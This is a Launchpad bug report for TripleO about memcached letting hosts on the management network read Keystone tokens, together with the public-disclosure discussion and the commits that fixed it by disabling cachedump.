tripleo

memcached on under/over clouds can be walked for tokens

Bug #1738835 reported by Derek Higgins on 2017-12-18

260

This bug affects 1 person

Affects		Status	Importance	Assigned to	Milestone
	tripleo	Fix Released	High	Derek Higgins	tripleo stein-3

Bug Description

memcached in various versions of tripleo contain keystone auth tokens which
can be retrived by a host on the same network.

Memcached in tripleo is running in such a way as to allow users to walk and read the contents. As memcached contains keystone tokens, user with access to the service (e.g. on the management network) can read those tokens.

Tags:

Revision history for this message

Derek Higgins (derekh) wrote on 2017-12-18:

After discussing with various stakeholders, as this requires access to trusted networks we're happy that this doesn't require a embargo. So I propose making it public and fixing in the open.

Revision history for this message

Jeremy Stanley (fungi) wrote on 2017-12-18:

Switching to a public workflow makes sense in light of this only being vulnerable to attackers with access to privileged infrastructure networks. If this were a reported vulnerability in a vulnerability:managed deliverable for OpenStack, the I would make the same recommendation on the part of the OpenStack VMT.

Revision history for this message

Derek Higgins (derekh) wrote on 2017-12-20:

I sent a PR to puppet-memcached to start the ball rolling here
https://github.com/saz/puppet-memcached/pull/90

Once its merged I'll switch to the public workflow and send patches for the openstack bits

Revision history for this message

Derek Higgins (derekh) wrote on 2018-01-29:

The patch to memcached is merged and now in a promoted repository so I'm going to make this public and push some patches to use it

information type:

Private Security → Public

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2018-01-29: Fix proposed to instack-undercloud (master)

Fix proposed to branch: master
Review: https://review.openstack.org/538986

Changed in tripleo:
assignee:	nobody → Derek Higgins (derekh)
status:	New → In Progress

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2018-01-29: Fix proposed to tripleo-heat-templates (master)

Fix proposed to branch: master
Review: https://review.openstack.org/538987

Bogdan Dobrelya (bogdando) on 2018-01-31

Changed in tripleo:
importance:	Undecided → High
milestone:	none → queens-rc1
tags:	added: pike-backport-potential
information type:	Public → Public Security

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2018-02-06: Fix merged to instack-undercloud (master)

Reviewed: https://review.openstack.org/538986
Committed: https://git.openstack.org/cgit/openstack/instack-undercloud/commit/?id=a4d6987c744be2ff207e0299e5cb52126cfa9ad3
Submitter: Zuul
Branch: master

commit a4d6987c744be2ff207e0299e5cb52126cfa9ad3
Author: Derek Higgins <email address hidden>
Date: Wed Dec 13 15:30:48 2017 +0000

Disable memcached's cachedump

To prevent users walking the memcached keys, Add "-X".

Partial-Bug: #1738835

Change-Id: I363c8faefcb4ce5153030e36498a7a7961520b01

Alex Schultz (alex-schultz) on 2018-03-02

Changed in tripleo:
milestone:	queens-rc1 → rocky-1

Alex Schultz (alex-schultz) on 2018-04-20

Changed in tripleo:
milestone:	rocky-1 → rocky-2

Emilien Macchi (emilienm) on 2018-06-05

Changed in tripleo:
milestone:	rocky-2 → rocky-3

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2018-06-13: Change abandoned on tripleo-heat-templates (master)

Change abandoned by Emilien Macchi (<email address hidden>) on branch: master
Review: https://review.openstack.org/538987
Reason: The gate is having serious troubles with docker.io, we need to abandon this patch so it leaves the gate and when it's stable again I will restore this patch. Please do not restore or do anything, I'll take care of it as soon as things work again.

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2018-06-15: Fix merged to tripleo-heat-templates (master)

Reviewed: https://review.openstack.org/538987
Committed: https://git.openstack.org/cgit/openstack/tripleo-heat-templates/commit/?id=317ed3194e8d30c7701a6793e81ba1f76d1e0b12
Submitter: Zuul
Branch: master

commit 317ed3194e8d30c7701a6793e81ba1f76d1e0b12
Author: Derek Higgins <email address hidden>
Date: Tue Dec 12 14:59:37 2017 +0000

Disable memcached's cachedump

    To prevent users walking the memcached keys, Add "-X"
    to memcached in both containerized and puppet memcached
    overcloud services.

Change-Id: I50eefdbdf7a7911f2ba6a7f3b4e739b8e67a7c1c
Partial-Bug: #1738835

Emilien Macchi (emilienm) on 2018-07-26

Changed in tripleo:
milestone:	rocky-3 → rocky-rc1

Alex Schultz (alex-schultz) on 2018-08-14

Changed in tripleo:
milestone:	rocky-rc1 → stein-1

Juan Antonio Osorio Robles (juan-osorio-robles) on 2018-10-30

Changed in tripleo:
milestone:	stein-1 → stein-2

Emilien Macchi (emilienm) on 2019-01-13

Changed in tripleo:
milestone:	stein-2 → stein-3

Juan Antonio Osorio Robles (juan-osorio-robles) on 2019-01-29

Changed in tripleo:
status:	In Progress → Won't Fix
status:	Won't Fix → Fix Released

Report a bug

This report contains Public Security information

Everyone can see this security related information.

You are

Subscribing...

Edit bug mail

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.